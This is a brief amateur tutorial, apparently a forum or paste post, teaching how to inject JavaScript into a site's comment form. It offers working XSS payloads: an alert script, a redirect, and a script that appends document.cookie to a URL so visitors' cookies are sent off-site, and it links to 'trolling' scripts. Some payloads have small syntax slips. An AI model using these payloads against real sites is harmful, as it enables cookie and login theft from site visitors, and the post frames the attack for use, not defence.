XSS

1. Hey!
2. Today i will teach you basics of XSS-attack
3.  
4. If you havent heard about XSS attacks i suggest that you read:
5. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
6. and
7. https://excess-xss.com/
8.  
9. In this scenario we will inject javascript using comment form.
10.  
11. You can use javascript like
12.  
13. <script type="text/javascript">
14. alert("123 test 123")
15. </script>
16.  
17. To create alert saying "123 test 123" everytime someone visits site
18.  
19. you can also use these javascripts for trolling reasons
20. https://www.mediafire.com/folder/z553a49pjbil5/javascripts
21. (you can make text blink, you can redirect the page or you can rick roll with these scripts for example)
22.  
23. also you can use
24.  
25. <script type"text/javascript">
26. window.location = ’http://victim/path/cookies.php?cookie=hey’;
27. </script>
28.  
29. This will spam victims cookie.php with word "hey"
30.  
31. To get victim websites cookies use
32.  
33. <script type"text/javascript">
34. window.location = ’http://victim/path/cookies.php?cookie=hey’+document.cookie;
35. </script>
36.  
37. Now you should see all saved cookies in url bar
38. (you might see Login details or ip addresess for example)
39.  
40. you can exploit XSS using urlbar,comment form or tool called Xenotix.
41.  
42. (In Xenotixs POST request scanner enter the script to Parameters bar which is below URL)
43.  
44. Now you should know basics of XSS attacks.
45.  
46. -pahapoika91